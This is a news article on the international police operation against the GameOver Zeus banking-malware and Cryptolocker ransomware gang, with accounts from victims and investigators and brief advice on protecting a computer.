Exclusive: behind the scenes as police across the world hit a notorious group of cyber criminals responsible for hacking into computers, stealing up to half a billion pounds and blackmailing victims.
It was one of the most sophisticated cyber crime campaigns ever mounted: a hacking spree that snared millions of victims worldwide and netted the gang behind it as much as half a billion pounds. Not content with raiding the bank accounts of their victims, the thieves blackmailed them, and then hijacked their computers to snare even more targets.
The criminal network behind it has now been hit by a global police operation. Channel 4 News was given exclusive access to the UK’s National Cyber Crime Unit (NCCU) as it helped in the take-down of the GameOver Zeus Crew, a notorious group of computer criminals believed to be based in Russia.
The gang used carefully crafted phishing emails to trick its way on to victims’ machines, often masquerading as urgent messages from HMRC or Companies House. Some corporate victims told Channel 4 News that the emails included specific details about their company to add to their authenticity.
The emails included an attachment or link, and when the recipient clicked on it they were infected with GameOver Zeus, a powerful new virus. It first checked whether the computer’s keyboard was set up in Russian, and if not, it installed a more complex virus which gave the criminal gang complete control over the machine.
“Anything you can do on your computer, they can do on your computer without you knowing,” said Stewart Garrick, who has led the NCCU’s investigation into the gang. “I know of more than 15,000 computers in the UK infected with this right now.”
The virus was used to blackmail victims, steal cash from their accounts, and then force the infected computer to snare other victims.
It gave the criminals real-time access to the victim’s entire online life: Channel 4 News was shown how the hackers can record videos of everything that appears on the screen, gather passwords for websites, and even switch on the webcam.
Blackmail is a key tactic, and the gang was behind a global extortion campaign that snared doctors’ surgeries, lawyers and even police stations. It used the virus to launch Cryptolocker, which scrambles the victims’ files and gives them deadline to pay a ransom of hundreds of pounds to get them back.
Eunice Power, a chef in Co Waterford, found the contents of her laptop scrambled. “This big red screen appeared saying ‘your files have been encrypted’. I checked the files and it was all gobbledy-gook, one after the other. I unplugged it thinking that would sort it out but it didn’t.
“At this point it was flashing up an amount of time, I had 72 hours to pay a ransom. I had an external back-up which was plugged in at the time so that was all encrypted. I could feel perspiration coming out through me. I didn’t believe anything could be so evil.”
The blackmailers demanded payment in the virtual currency Bitcoin. As Mrs Power struggled to make the payment work, the countdown hit zero.
“I lost everything: family photos, accounts, payroll, everything. If someone had robbed my house it would have been easier. It was devastating,” she said.
Her folders are still intact, meaning she can see which photos and documents she lost, but when she tries to open them, she is confronted with incomprehensible code.
Blackmail is just one option: the thieves’ main target is internet banking.
“They want to monetise the investment they’ve made in getting into your machine,” said Don Smith of Dell SecureWorks, which has spent years tracking the gang. “They are absolutely after dollars, pounds and euros.”
Once installed the virus waits for the computer to connect to online banking, and then alerts the criminal, who can manipulate what the victim sees on screen, throwing up fake pages and tricking them into authorising transfers out of their account.
With the criminals' network disrupted, now is the time to protect your computer. There are three things you need to do:
1. Update your operating system (this is Microsoft Windows if you own a PC, or Mac OS if you have an Apple machine).
2. Install, update and run anti-virus software. There are many options but try to buy it as a physical CD - that way you don't risk downloading from a dodgy website.
There is more advice on the government's Get Safe Online website
“They are able to inject pages between the user and their bank without anyone being any the wiser,” said Smith. “They can ask for extra login credentials, ask for credit card numbers, anything to get the victim to a point where money can be transferred out.”
One of the victims was AEV, a varnish factory in Birkenhead. One of its employee’s computers was infected with the virus after clicking on an email.
The thieves’ fake webpages convinced her that her bank login had failed, and that she needed to use the keypad which is normally used to make transfers. Unwittingly, by using the keypad she authorised two payments to accounts in the Ukraine and Cyprus.
“We lost £100,000 in under three minutes,” said AEV Managing Director Jonathan Kemp. “We started the day normally, and by the end of it there was utter horror.”
The business eventually got the money back from the bank, but in the meantime, after it went public, it was contacted by dozens of other fellow victims.
“The phone started ringing. Eventually we ended up with 40 or 50 businesses that had been hit. I calculated the losses at something like £3.5m,” said Mr Kemp.
In fact, there are millions of victims around the world. Once infected, a victim’s computer becomes part of the criminals’ network. It can be used to send instructions to other hacked machines, and to send phishing emails to snare more targets.
This weekend, the NCCU, in co-operation with tech companies, the FBI and other forces around the world, moved in to break up the network. They reprogrammed the infected computers to stop them communicating with each other, and then with the help of internet companies hit the hackers’ fallback network of command computers which can send instructions to the hacked machines.
“This is the biggest operation I’ve been involved with in 28 years in law enforcement,” said Mr Garrick. “We’re taking unprecedented steps, and it’s truly global in scale.”
The NCCU’s hope is that if it can stop the GOZ Crew’s virus network from receiving updates, it will give software and anti-virus firms a chance to catch up. Users can then update their software, run anti-virus programmes, and protect themselves from the gang.
“It’s a window of opportunity,” said Mr Garrick. But with the criminals able to vanish into cyberspace at the press of a button, it seems inevitable they will return soon with newer, smarter tactics.